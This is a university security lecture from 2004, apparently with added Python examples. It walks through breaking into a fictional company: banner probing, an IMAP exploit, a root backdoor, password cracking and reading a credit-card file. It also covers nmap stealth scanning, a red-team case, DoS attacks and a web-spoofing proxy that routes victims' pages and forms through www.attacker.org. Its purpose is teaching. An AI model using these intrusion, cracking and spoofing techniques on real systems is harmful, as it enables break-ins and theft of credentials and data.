sec_l16_2004student - Pacific Lutheran University


Introduction to Computer Security
Lecture 16
Dr. Richard Spillman
Pacific Lutheran University
Summer 2004
Last Lecture
• Computer Crime
• History
• The Internet Worm
• Introduction to Networks
• Introduction to Network Security
Review - Goals
• Network security must, at a minimum:
– Keep assets available: operational and protected from vandalism and other outages
– Protect confidential property and assets
– Maintain the integrity of important information
Outline
• Computer Crimes
• An Example Attack
• Network Intrusion Techniques
• Case Study: A Red Team Report
• Other Common Attacks
• Firewalls
CyberAttacks
• Perhaps even more concerning than the overall increase in new vulnerabilities is that the rise was driven almost exclusively by vulnerabilities rated as either moderately or highly severe.
– In 2002, moderate and high severity vulnerabilities increased by 84.7%, while low severity vulnerabilities rose by only 24.0%.
Crimes 1
• Co-operators Life Insurance Company has warned more than 180,000 customers across Canada about possible identity theft after the disappearance of a computer hard drive containing personal information.
• In a letter to life insurance and pension plan clients, the top official of the company's parent firm says the loss of the hard drive in Regina is extremely serious and "theft of an individual's identity is possible in such circumstances."
– "Vital information such as name, address, date of birth, social insurance number and mother's maiden name can be used to access financial accounts, open new bank accounts, transfer bank balances, apply for loans, credit cards and other financial services."
Crimes 2
• DALnet suffered a debilitating distributed denial-of-service (DDoS) attack beginning in January 2003, over a month in duration, that may force it offline.
• According to a DALnet statement, the attack against its DNS systems and its Web, IRC and e-mail servers is causing "great inconvenience and financial loss" for many organizations that host its services.
– Some have suspended or discontinued their support of DALnet, which is staffed by volunteers and run with donated equipment and bandwidth.
– DALnet says it is working with law enforcement to locate and prosecute its attackers.
Crimes 3
• The accounts of millions of AOL subscribers
were jeopardized in January 2003 due to a
serious flaw in the company's Web-based mail
system
– The vulnerability stems from an error in one of AOL's
international e-mail authentication systems, which
granted users access without correctly verifying
passwords.
– By simply entering an account name, an AOL user
had the ability to read any other user's e-mail and all
personal data contained therein.
– Private correspondence suddenly became open for
public perusal, and sensitive information such as
passwords and account numbers were potentially
exposed to prying eyes.
The Goal
• Your goal is to attack the Web site for Bigwidget
Gather Information
• Find basic information about their website
– Go to http://www.internic.net/ and type in the company name (a whois lookup of the domain registration)
Result
BIGWIDGET.COM
Registrant:
BigWidget, Conglomerated. (BWC2-DOM)
1234 Main Street
Anytown, GA USA
Domain Name: bigwidget.com
Administrative Contact, Technical Contact, Zone Contact:
BigWidget Admin (IA338-ORG) [email protected]
Phone- 678-555-1212
Fax- 678-555-1211
Billing Contact:
BigWidget Billing (IB158-ORG) [email protected]
Phone- 678-555-1212
Fax- 678-555-1211
Record last updated on 29-Jun-98.
Record created on 30-Jun-94.
Database last updated on 13-Oct-98 06:21:01 EDT.
Domain servers in listed order:
EHECATL. BIGWIDGET    208.21.0.7
NS1.SPRINTLINK.NET    204.117.214.10
NS.COMMANDCORP.COM    130.205.70.10
The record hands the attacker contact names, e-mail addresses and phone numbers (useful for social engineering) plus the name servers, the first of which sits in the target's own address block.
Try to Connect . . .
Try to access port 25, the SMTP port (sendmail on most Unix hosts of the time):
hacker: ~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
Connection closed by foreign host.
It appears to work, then the connection is suddenly closed, probably by a firewall. Continue to try other ports . . .
Success
Try to access port 143 (IMAP):
hacker:~$ telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
It is successful: the firewall lets port 143 through, and the banner identifies an IMAP4rev1 server, most likely on a Unix/Linux host, so there is a hole in the firewall to work with.
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
Log off and try to find a way to break in through the IMAP port. Note that the server volunteered its software and version number before any authentication; that banner is exactly what the attacker searches for next.
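The two telnet probes above, done programmatically: a TCP connect probe that tells a silently dropped connection (firewall) from a refused one (closed port) and from an open port, and reads whatever banner the service volunteers. This is an added example, not code from the lecture; it starts a throw-away listener in-process that replays a banner modelled on the slide's, so it runs offline, and the host, port and banner string it uses are local test values, not the real server's.

```python
import re
import socket
import threading

# Constructed greeting in the format of the slide's IMAP banner (the real
# server's string is an assumption here; only the shape matters).
FAKE_IMAP_BANNER = (b"* OK bigwidget IMAP4rev1 Service 9.0(157) at "
                    b"Wed, 14 Oct 1998 11:51:50 -0400 (EDT)\r\n")


def start_fake_imap(host="127.0.0.1"):
    """Listen on an ephemeral loopback port and send the greeting to each client.

    Returns (server_socket, port); close the socket to stop the thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed
                return
            with conn:
                conn.sendall(FAKE_IMAP_BANNER)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port(host="127.0.0.1"):
    """Find a loopback port nothing is listening on (to demonstrate 'closed')."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def probe(host, port, timeout=1.0):
    """TCP connect probe: ('open', banner), ('closed', ''), ('filtered', '') or ('unreachable', '').

    A firewall that silently drops the SYN shows up as a timeout ('filtered');
    a RST from a closed port or a reject rule shows up as ECONNREFUSED
    ('closed'); the slide's port-25 case (accepted, then dropped before any
    data) comes back 'open' with an empty banner."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except socket.timeout:
        s.close()
        return "filtered", ""
    except ConnectionRefusedError:
        s.close()
        return "closed", ""
    except OSError:
        s.close()
        return "unreachable", ""
    try:
        data = s.recv(512)
    except (socket.timeout, ConnectionResetError):
        data = b""
    finally:
        s.close()
    return "open", data.decode("ascii", "replace").strip()


# UW-IMAP style greeting: "* OK <host> IMAP4rev1 Service <version> at <date>"
IMAP_BANNER_RE = re.compile(
    r"^\* OK (?P<host>\S+) (?P<proto>IMAP4rev\d) Service (?P<version>\S+) at ")


def parse_imap_banner(banner):
    """Extract host, protocol and server version from the greeting, or None."""
    m = IMAP_BANNER_RE.match(banner)
    return m.groupdict() if m else None


if __name__ == "__main__":
    srv, port = start_fake_imap()
    state, banner = probe("127.0.0.1", port)
    print(state, banner)
    print(parse_imap_banner(banner))
    print(probe("127.0.0.1", free_port()))
    srv.close()
```

The defender's side of the same observation: a service that identifies its vendor and version before authentication is doing the attacker's first research step for them, so suppress or genericise banners on anything reachable from outside, and treat a firewall rule that lets one legacy port through as an exposure of that whole daemon, not of "just port 143".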
More Information
• Go to a web site called RootShell (an exploit archive)
IMAP Weakness
• Search on IMAP. There are several available; select one.
Download the Program
Run the Attack
Compile the program and run it against the BigWidget server:
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
root
What has happened?
Result
• You are through the firewall and on the server as
root.
– There are no more defenses
• The program you used against BigWidget made
the Linux server allow you to log on as root
WITHOUT having to use a password!
– This is a real hole and there are thousands more like
them available on hacker sites across the web. Not
just for Linux but for every conceivable operating
system running today.
Attack the System
Now try to find which machines on the network will trust you:
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1     localhost   localhost.localdomain
208.21.2.10   thevault    # accounting
208.21.2.11   fasttalk    # sales
208.21.2.12   geekspeak   # engineering
208.21.2.13   people      # human resources
208.21.2.14   thelinks    # marketing
208.21.2.15   thesource   # information systems
Accounting
Log off, come back in through the root-shell backdoor listening on port 31337 of the web server (www, 208.21.0.35), and from there log on to the accounting machine (thevault) with rlogin, relying on the host-based trust between the two machines:
# exit
Connection closed by foreign host.
hacker:/export/home/hacker> telnet www.bigwidget.com 31337
Trying 208.21.0.35...
Escape character is '^]'.
Granting rootshell...
# hostname
www
# whoami
root
# rlogin thevault
Search the Directories
You find a creditcards directory with a file called visa.txt. Read it:
thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith     6543-2223-1209-4002   12/99
Donna D. Smith     6543-4133-0632-4572   06/98
Jim Smith          6543-2344-1523-5522   01/01
Joseph L. Smith    6543-2356-1882-7532   04/02
Kay L. Smith       6543-2398-1972-4532   06/03
Mary Ann Smith     6543-8933-1332-4222   05/01
Robert F. Smith    6543-0133-5232-3332   05/99
Use a password cracking program to discover some system passwords:
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman   password: nambob
username: mary     password: mary
username: root     password: ncc1701
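The `crack /etc/passwd` step above, as an added example that is not the lecture's tool: an offline dictionary attack that tries the cheapest guesses first, the login name and simple transformations of it, before a wordlist, which is exactly what recovers the three passwords on the slide (nambob is bobman reversed, mary's password is her login, ncc1701 is a common wordlist entry). Assumptions: the password file is a constructed one in a made-up user:salt:sha256hex format standing in for crypt(3) hashes, because the hashing scheme makes no difference to the method, and the wordlist is constructed too.

```python
import hashlib


def hash_pw(salt, password):
    """Stand-in for crypt(3): salted SHA-256 (assumption; the scheme is not the point)."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed password file in a made-up user:salt:digest format.  The
# plaintexts are the ones the slide reports; 'alice' has a strong passphrase.
PASSWD_FILE = "\n".join([
    "bobman:Xy:" + hash_pw("Xy", "nambob"),
    "mary:Qp:" + hash_pw("Qp", "mary"),
    "root:7f:" + hash_pw("7f", "ncc1701"),
    "alice:m3:" + hash_pw("m3", "correct horse battery staple"),
])

# Constructed wordlist; real ones run to millions of entries.
WORDLIST = ["password", "letmein", "enterprise", "ncc1701", "qwerty"]


def username_guesses(user):
    """Cheap, high-yield guesses derived from the login name itself."""
    return [user, user[::-1], user.capitalize(), user + "1", user + user]


def candidates(user, wordlist):
    """Yield guesses in order of increasing cost, each at most once."""
    seen = set()
    for guess in username_guesses(user) + list(wordlist):
        if guess not in seen:
            seen.add(guess)
            yield guess


def crack(passwd_text, wordlist):
    """Return {user: password} for every account whose hash matched a guess.

    Each guess is hashed with that account's own salt; the salt stops one
    computed hash from being reused across accounts but does nothing against
    a short guess list like this one."""
    found = {}
    for line in passwd_text.splitlines():
        user, salt, digest = line.split(":")
        for guess in candidates(user, wordlist):
            if hash_pw(salt, guess) == digest:
                found[user] = guess
                break
    return found


if __name__ == "__main__":
    for user, pw in crack(PASSWD_FILE, WORDLIST).items():
        print(f"username: {user:8s} password: {pw}")
```

Two things the example makes concrete. First, the attack only works because the hashes were readable: the intruder already had root on thevault, but on a system without a shadow file any local user could have run the same loop. Second, the hash function only sets the price per guess; the 1990s DES crypt was fast and had a 12-bit salt, so a wordlist of a few hundred thousand entries ran in minutes, whereas a deliberately slow scheme raises the cost of every guess but still does nothing for "mary".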
General Attack Styles
• There are two attack styles: Equal Opportunity and Specific Target
• Equal Opportunity
– Looks for ANY host that is vulnerable to an exploit (or exploits) that the hacker knows.
– Probably has nothing against the site being attacked (except contempt for its security).
– Looking to steal resources and/or launch other attacks from the exploited hosts.
– Will only spend a short amount of time looking at your network.
• Specific Target
– Targets a specific organization.
– May be motivated by profit, revenge, or ideology.
– Spends a much larger amount of time collecting information about the network under attack.
Gather Information
• The hacker will want to determine the structure
of the network including
– What hosts exist on the network
– What are the routes for the network
– Where any firewalls are located
• Some, if not all, of the hosts for a network will be
listed in the domain records.
• To find the remaining hosts requires scanning.
• Using nmap (as in the last lecture)
Network Paths
• It is useful for the hacker to know the
structure of the network.
– Allows hacker to know the path packets will take
through the network
– May suggest machines to take over, that will allow
firewalls to be bypassed
• Routes can be determined by
– Asking the routers
– Tracing packets into the network
• traceroute (tracert.exe under NT) performs this function
Ask the Routers
• Simple Network Management Protocol (SNMP)
– Many sites have SNMP enabled routers but do not restrict who can retrieve information from them.
– Can be used to determine routing tables
• snmpnetstat is part of a collection of free SNMP client programs put out by Carnegie Mellon University
• snmpnetstat <host> public -rn ("public" is the default read-only community string, which is why the query so often works)

snmpnetstat challenger public -rn
Routing tables
Destination          Gateway              Flags   Interface
default              fw1                  UG      if0
156.80.189.49/32     lager                UG      if0
192.168.1            challenger.info-as   U       Ethernet0
192.168.4            crash.info-assuran   UG      if0
208.208.101.32/27    challenger.info-as   U       Ethernet1
208.208.101.64/27    challenger           U       Ethernet2
Packet Paths
• Traceroute can be used to see what path a packet takes to reach its destination

traceroute 198.6.1.1
Tracing route to cache00.ns.uu.net [198.6.1.1]
over a maximum of 30 hops:
  1   <10 ms   <10 ms   <10 ms  challenger.info-assurance.com [208.208.101.33]
  2   <10 ms    *       <10 ms  fw1.info-assurance.com [192.168.1.2]
  3   <10 ms    10 ms   <10 ms  iacgw.info-assurance.com [208.208.101.18]
  4    10 ms   <10 ms    10 ms  corpgw.info-assurance.com [192.168.2.1]
  5    10 ms    10 ms    20 ms  Fddi2-0.GW2.DCA1.ALTER.NET [137.39.62.33]
  6    10 ms    10 ms    20 ms  105.ATM3-0.XR1.DCA1.ALTER.NET [146.188.161.42]
  7    10 ms    10 ms    10 ms  195.ATM1-0-0.GW1.FFX2.ALTER.NET [146.188.160.161]
  8    10 ms    10 ms    20 ms  271.atm6.wodc7-esr1.ops.us.uu.net [207.18.172.66]
  9    10 ms    10 ms    20 ms  cache00.ns.uu.net [198.6.1.1]
Trace complete.
Port Scanning
• Used to determine what services might be running on a target that are visible through the firewall.
• One of the best is Nmap from www.insecure.org.
• Supports many techniques for detecting open ports
• Has stealth features to make it harder to detect
• Can frequently guess the operating system

nmap -O hacker
Starting nmap V. 2.3 by Fyodor ([email protected], www.insecure.org/nmap/)
Interesting ports on hacker (208.208.101.58):
Port    State   Protocol  Service
21      open    tcp       ftp
23      open    tcp       telnet
25      open    tcp       smtp
37      open    tcp       time
79      open    tcp       finger
111     open    tcp       sunrpc
512     open    tcp       exec
513     open    tcp       login
514     open    tcp       shell
2049    open    tcp       nfs
TCP Sequence Prediction: Class=random positive increments
Difficulty=12505 (Worthy challenge)
Remote operating system guess: Solaris 2.6 - 2.7
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
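An added example, not from the lecture: a parser for the nmap output format shown above (the sample text is a constructed copy of the slide's scan with the author's e-mail address left out) that turns the report into a structured record and then ranks the open ports the way an attacker reading this slide would, using the reasoning of the Common Vulnerabilities and Exploit Vulnerabilities slides that follow. The ranking table is the editor's, not something nmap produces.

```python
import re

# Constructed copy of the slide's scan output (author e-mail omitted).
SAMPLE_SCAN = """\
Starting nmap V. 2.3 by Fyodor (www.insecure.org/nmap/)
Interesting ports on hacker (208.208.101.58):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
79      open        tcp       finger
111     open        tcp       sunrpc
512     open        tcp       exec
513     open        tcp       login
514     open        tcp       shell
2049    open        tcp       nfs
TCP Sequence Prediction: Class=random positive increments
                         Difficulty=12505 (Worthy challenge)
Remote operating system guess: Solaris 2.6 - 2.7
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
"""

HOST_RE = re.compile(r"^Interesting ports on (?P<host>\S+) \((?P<ip>[\d.]+)\):")
PORT_RE = re.compile(r"^(?P<port>\d+)\s+(?P<state>\w+)\s+(?P<proto>\w+)\s+(?P<service>\S+)$")
OS_RE = re.compile(r"^Remote operating system guess: (?P<os>.+)$")

# Why an attacker cares about each service (editor's table, not nmap's).
# Order matters: the most direct route to a shell comes first.
ATTACK_VALUE = [
    ("shell",  "rsh: trust by source address and .rhosts, no password"),
    ("login",  "rlogin: same host-based trust as rsh"),
    ("exec",   "rexec: remote command execution with a cleartext password"),
    ("nfs",    "NFS export: check showmount -e for world-readable/writable shares"),
    ("sunrpc", "portmapper: rpcinfo -p lists every RPC service (mountd, etc.)"),
    ("finger", "finger @host enumerates valid account names"),
    ("telnet", "cleartext logins; banner leaks OS and version"),
    ("ftp",    "cleartext logins; check for anonymous access and writable dirs"),
]


def parse_nmap(text):
    """Turn nmap 2.x text output into {'host', 'ip', 'os', 'ports': [...]}."""
    report = {"host": None, "ip": None, "os": None, "ports": []}
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            report["host"], report["ip"] = m["host"], m["ip"]
        elif m := PORT_RE.match(line):
            report["ports"].append({"port": int(m["port"]), "state": m["state"],
                                    "proto": m["proto"], "service": m["service"]})
        elif m := OS_RE.match(line):
            report["os"] = m["os"].strip()
    return report


def prioritize(report):
    """List (port, service, reason) for open ports worth attacking, best first."""
    open_by_service = {p["service"]: p["port"]
                       for p in report["ports"] if p["state"] == "open"}
    return [(open_by_service[svc], svc, why)
            for svc, why in ATTACK_VALUE if svc in open_by_service]


if __name__ == "__main__":
    r = parse_nmap(SAMPLE_SCAN)
    print(f"{r['host']} ({r['ip']}), OS guess: {r['os']}")
    for port, svc, why in prioritize(r):
        print(f"{port:5d}/{svc:7s} {why}")
```

Run against the slide's output the ranking puts the three Berkeley r-services (514, 513, 512) first, then NFS and the portmapper, then finger and the two cleartext login services; the time service on port 37 is not listed at all. That is also the order in which a defender should be closing them.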
OS Information
• Knowing the target OS enables the attacker to find specific exploit information and scripts.
• To determine the operating system the hacker can:
– Inspect the banners of services such as telnet, ftp, and smtp. These frequently reveal the name and version of the operating system.
– Use TCP/IP fingerprinting. This is a technique for determining an operating system by querying the target's TCP/IP stack and comparing its responses (initial sequence numbers, option ordering, handling of unusual flag combinations) against a database of known stacks.
• nmap supports very sophisticated TCP/IP fingerprinting
Common Vulnerabilities
• Services that allow information to be read from, or written to, the target's storage are great places to start an attack.
– File Transfer Protocol (FTP)
– Network File System (NFS)
– Server Message Block (SMB) - Windows 95/98/NT
Exploit Vulnerabilities
• rpcinfo -p <host> and showmount -e <host> can be used to determine if any part of a UNIX file system is shared.
• smbclient -L <netbios name> -I <target IP> can be used to determine SMB file shares (from the Unix Samba utility).
• User account information can be gained in a variety of ways.
– On Unix, the finger service (if it is running)
• finger user@host
– On Windows, through SMB
• smbclient -L host_name -I ip_address
– Social Engineering
Find New
Vulnerabilities
• Each service that has been identified is a potential
way of exploiting the system.
• There are many sources of information on the
Internet that distribute information about
vulnerabilities for different services.
• Most only list vulnerability information along with
how to fix or protect against the vulnerability
• Some list exploitation information as well.
Summary
• Hackers need information to be able to break into a network.
• There are many different ways they collect this information.
• Denying hackers information about your network (banners, DNS records, SNMP, visible open ports) removes the easy starting points and makes gaining access much harder.
Network Scanners
• Scanners are intended to simplify and
accelerate the process of finding
vulnerabilities and potential exploits on
a network or host.
• There are two major types of scanners:
– Port scanners
– Vulnerability scanners
Port Scanners
• Determine what ports are listening on a host.
• Many are freely available on the web
• Available for a wide variety of operating systems
• One of the most sophisticated scanners
available is nmap
nmap
• Available at www.insecure.org
• Runs on most versions of Unix
– Some features not available on some versions of Unix
– All features work under Linux.
• Supports
– Scanning for hosts
– Port scanning
– Operating system detection
nmap Scan Techniques 1
• nmap has many ways to conduct host and port scans.
• These include
– TCP (-sT) - Very basic TCP connect scan. Scans often leave error or connect messages in the target's logs.
– SYN (-sS) - Similar to -sT, but does not complete the TCP three-way handshake. Less likely to be logged by the target.
– FIN (-sF) - Uses packets with the FIN flag set. May be more stealthy than SYN scanning.
– Xmas (-sX) - Turns on several flags (FIN, URG, PUSH) in packets.
nmap Scan Techniques 2
• Types of scans (cont'd)
– Null (-sN) - Sends empty packets (no TCP flags set) to the target. Ineffective against Windows systems, which answer with a RST whether the port is open or closed.
– Ping (-sP) - Only determines if a target host is up. Uses TCP-based methods in addition to ICMP.
– UDP (-sU) - Sends empty (zero-byte) UDP packets to determine open UDP ports: a closed port answers with ICMP port unreachable, silence means open or filtered.
– RPC (-sR) - Works in combination with other scans to identify SunRPC services.
nmap Options 1
• Defining the target port
– The default is to scan 1 through 1024 plus any services listed in /etc/services
– Set port range (-p <port range>)
• Sets the ports that Nmap will scan
– Fast scan mode (-F)
• Scans all ports listed in Nmap's included services file
• Defining the source port (-g <port #>)
– Useful for bypassing some firewall filters (a filter that admits traffic by source port, e.g. DNS replies from 53 or ftp-data from 20, lets such packets through).
• Operating System identification (-O)
– Uses TCP/IP fingerprinting technique to very accurately guess the Operating System of the host being scanned.
nmap Options 2
• Spoofing the source address (-D <list of decoys>)
– Sends spoofed packets from each decoy to attempt to hide the real source of the scan.
• Fragmenting the attack (-f)
– Increases the potential stealth and success of a scan
– Works in combination with SYN, FIN, Xmas, Null scan types
Network Vulnerability Scanners
• In addition to identifying open ports, network
vulnerability scanners have the ability to test
these open ports for known vulnerabilities.
• Their ability to detect a vulnerability is limited by
their vulnerability database.
• There are two main types
– General
– Specific
General NVS
• Have large databases of vulnerabilities
• Can be used by a hacker to learn a broad range
of vulnerabilities for the network under attack
• Detected easily by Intrusion Detection Systems
and/or log reviews.
• Used more frequently by system administrators to
identify weakness in their own network.
General Scanners
• Free Network Vulnerability
scanners
– Security Administrator's Integrated Network
Tool (SAINT)
• An updated version of the notorious SATAN tool.
– The CIAC produce a tool called Courtney that
attempts to detect SAINT/SATAN scans.
– Nessus by Renaud Deraison
• Open source vulnerability scanner
• First released April 1999
Specific NVS
• Usually target just one specific
vulnerability
• Used to search through a large number of
hosts to identify those that might be
susceptible to an exploit known by the
hacker
• Much less use to network administrators
as they only focus on one narrow area of
vulnerability.
Specific Profile Inspector (SPI)
• Distributed host scanner
– hosts are scanned by modules that report their results to a management console
• Product of the Computer Security Technology Center at the Lawrence Livermore National Laboratory
– http://ciac.llnl.gov/cstc/spi/spiwnt/spiv20.html
• Latest version is 2.01
• Freely available to all U.S. Government agencies
Penetration Experiment
• The following slides outline an actual break-in that was conducted by a Red Team
– A Red Team is formed to perform a break-in on a generally unsuspecting client system
• All identification of the team and the client has been removed and only a few of the details of the experiment are reported
– The results illustrate how easy it is in "real" life to break into a computer system even when it has some defenses in place
Scanning the Network
• dig (the DNS query tool) was used to research the domain records for the organization.
• A web search engine (the slide cites www.htdig.org, the ht://Dig site-search software) was also used.
• nmap was run against the networks that were found.
– A database of open ports for these hosts was created
Network Structure
• From the nmap data we were able to deduce the structure of one of the networks including the filtering rules and type of firewall.
[Diagram: Internet - Firewall - internal segment with Workstation, ServerA, Workstation]
Firewall Rulebase
Source IP    Source Port  Destination IP  Destination Port  Proto  Flags  Action  Description
Private Net  Any          Any             Any               TCP    Any    Allow   Allow all outbound traffic
Any          Any          ServerA         80                TCP    Any    Allow   Allow http requests to ServerA
Any          Any          Any             Any               Any    Any    Reject  Disallow all other traffic
Information Gathering
• The only service that was available for attack was http on port 80 to ServerA.
• We used a telnet client to manually request a page from the web server.
• By inspecting the HTTP response headers (the Server: header) we were able to determine that they were running Windows NT Server with Internet Information Server version 4.0.
Known Vulnerability
• Microsoft web servers frequently have the Microsoft FrontPage Extensions installed.
• By attempting to connect to ServerA using the Microsoft FrontPage client, we were able to determine that the server was running the FrontPage extensions. Further, the FrontPage admin password was NOT set.
Microsoft Frontpage
• With admin rights to their FrontPage web
site comes the ability to read and write
files to the web servers hard disk.
– This is limited to the section of the disk where
the web site is located.
• The IIS web server was also configured to
execute programs at the request of a
browser.
– This capability is common and is the way
many sites provide dynamic content.
Gaining Control
• We transferred a program to one of the web server's directories, then asked the web server to execute the program for us.
• Our program was executed by the web server and therefore had the same system privileges as the web server.
• Using the console we were able to capture the system registry file (which contains the NT user account information).
• L0phtcrack was run against this file and was able to break the Administrator's password.
Result
• With the Administrator’s password we
were able to take full control of ServerA
• Using Server A as a launching point we
were able to circumvent the firewall,
allowing us to attack all of the hosts on the
network
Case Summary
• It does not take much access into a network for it to be vulnerable to attack.
• Servers that offer publicly accessible services are vulnerable to attack.
• If public and private systems are located on the same network segment, a penetration of the public system allows
Denial of Service
• Attacks don’t break in, but they deny you
access to your own resources.
• Several recent incidents reported; more
are likely.
• Defending against such attacks is very
hard. If it’s cheaper for the attacker to
send a message than for you to process it,
you lose.
SMURF Attack
• Attacker sends “ping” to intermediate network’s
broadcast address.
• Forged return address is target machine.
• All machines on intermediate network receive
the “ping”, and reply, clogging their outgoing net
and the target’s incoming net.
• Firewalls at target don’t help -- the line is
clogged before it reaches there.
Other DoS Attacks
• Teardrop
– Send overlapping IP fragments.
– Destination machine doesn't handle the overlap properly, and crashes.
• Ping of Death
– Send a very large IP packet, fragmented into many smaller ones.
– The reassembled datagram exceeds the 65,535-byte maximum, so the 16-bit length wraps and the reassembly buffer overflows, crashing the target.
• Both can get through some firewalls, because a filter that inspects fragments one at a time never sees the problem that only appears on reassembly.
LAND Attack
• Send TCP packet where the source and
destination addresses are that of the
target machine, and the port numbers
match.
• Target sees this as an attempt to connect
a socket to itself, and gets terminally
confused.
• Can be blocked by anti-spoofing filter.
DNS Attack
• Attacker sets up a Domain Name Server
• When an applet asks the DNS to resolve a host address, the DNS lies about the IP address, so the applet's "connect only back to the host you came from" check is satisfied for a host it should not be able to reach
• Netscape 2.01 and JDK 1.01 fixed this by determining if a connection is allowed based on the IP address
Web Spoofing
• Attacker modifies web server
– A page in the attacker's server has all hyperlinks set to the attacker server
• When the user navigates through one of these hyperlinks:
– the attacker's server receives the request
– downloads the real page
– alters the hyperlinks
– rewrites the page before passing it to the user
Attack Diagram
[Figure not reproduced in the transcript]
How Spoofing Works
• The key to this attack is for the attacker's Web server to sit between the victim and the rest of the Web.
• This kind of arrangement is called a "man in the middle attack"
• The first step is called URL Rewriting
URL Rewriting
• The attacker's first trick is to rewrite all of the URLs on some Web page so that they point to the attacker's server rather than to some real server.
– Assuming the attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org/ to the front of the URL.
– For example, http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com.
– When the victim requests a page through one of the rewritten URLs, the victim's browser requests the page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker's server where on the Web to go to get the real document.
False Web
• Once the attacker's server has fetched the real document needed to satisfy the request:
– the attacker rewrites all of the URLs in the document into the same special form by splicing http://www.attacker.org/ onto the front.
– Then the attacker's server provides the rewritten page to the victim's browser.
– Since all of the URLs in the rewritten page now point to www.attacker.org, if the victim follows a link on the new page, the page will again be fetched through the attacker's server. The victim remains trapped in the attacker's false Web, and can follow links forever without leaving it.
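The rewriting step, as an added example rather than code from the lecture or from the original web-spoofing paper: a function that rewrites every link, image and form target in a fetched page to go through www.attacker.org (the host named on the slides), and the inverse the attacker's server applies to an incoming request to find the real page to fetch. The sample page and its base URL are constructed; relative links are resolved against the base first, because the rewritten page is served from a different origin and a bare `/about` would otherwise escape the false Web. A small check of the kind the Spoofing Clues slide describes (does the location line show the expected host?) is included.

```python
import re
from urllib.parse import urljoin

ATTACKER = "http://www.attacker.org/"

# href=, src= and action= attributes, quoted or bare (a regex is enough for the
# demonstration; a real rewriting proxy would use an HTML parser).
ATTR_RE = re.compile(
    r"""(?P<attr>\b(?:href|src|action)\s*=\s*)(?P<q>["']?)(?P<url>[^"'\s>]+)(?P=q)""",
    re.IGNORECASE)

# Constructed victim page, served from BASE in the real Web.
BASE = "http://home.netscape.com/index.html"
SAMPLE_PAGE = """<html><body>
<a href="http://home.netscape.com">Home</a>
<a href="/about">About</a>
<img src='logo.gif'>
<form action="/cgi-bin/login" method="post"><input name="pw"></form>
</body></html>"""


def wrap(url, base):
    """Rewrite one URL: absolutize it against the page it came from, then prefix."""
    absolute = urljoin(base, url)
    if absolute.startswith(ATTACKER):
        return absolute              # already trapped; never double-wrap
    return ATTACKER + absolute


def rewrite_page(html, base):
    """Rewrite every link, image and form target in a page fetched from `base`."""
    def repl(m):
        return m["attr"] + m["q"] + wrap(m["url"], base) + m["q"]
    return ATTR_RE.sub(repl, html)


def unwrap(requested_url):
    """Attacker's server side: recover the real URL from a rewritten request."""
    if not requested_url.startswith(ATTACKER):
        raise ValueError("not a rewritten URL: " + requested_url)
    return requested_url[len(ATTACKER):]


def spoofed_location(displayed_url, expected_host):
    """The 'Spoofing Clues' check: does the location line show the wrong host?"""
    host = re.match(r"https?://([^/]+)", displayed_url)
    return host is None or host.group(1).lower() != expected_host.lower()


if __name__ == "__main__":
    print(rewrite_page(SAMPLE_PAGE, BASE))
```

Form targets are rewritten exactly like links, which is why the False Web Forms slide needs no extra machinery: the POST simply arrives at www.attacker.org, which forwards it. The `spoofed_location` check is also the weak point the Problem slide exploits, since it trusts what the browser displays.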
False Web Forms
• If the victim fills out a form on a page in a false Web, the result appears to be handled properly.
– Spoofing of forms works naturally because forms are integrated closely into the basic Web protocols: form submissions are encoded in Web requests and the replies are ordinary HTML.
– When the victim submits a form, the submitted data goes to the attacker's server. The attacker's server can observe and even modify the submitted data, doing whatever malicious editing is desired, before passing it on to the real server.
– The attacker's server can also modify the data returned in response to the form submission.
Secure Connections
• Secure connections do not help
• If the victim does a "secure" Web access in a false Web, everything will appear normal:
– the page will be delivered, and the secure connection indicator (usually an image of a lock or key) will be turned on.
– The victim's browser says it has a secure connection because it does have one. Unfortunately the secure connection is to www.attacker.org and not to the place the victim thinks it is. The certificate is the attacker's own, valid for www.attacker.org, and the browser has no way to know which site the user intended.
Spoofing Clues
• There are some clues that could indicate
that you are the victim of a spoofing attack
– Status line indicator: when the mouse is held
over a link or during the transfer to a link, the
status line will show the target site
– Location line: the location line displays the
current URL
• If you monitor these lines you should notice
the strange URL
Problem
• The attacker can cover up both of these cues by
adding a JavaScript program to every rewritten
page.
– Since JavaScript programs can write to the status
line, the attacker can arrange things so that the status
line always shows the victim what would have been
on the status line in the real Web.
– A JavaScript program can hide the real location line
and replace it by a fake location line that looks right
and is in the expected place. The fake location line
can show the URL the victim expects to see.
CGI Programs
• A CGI program
– processes the data of a submitted web form
– is an executable run by the web server, and therefore a major source of security holes
• Two dangers:
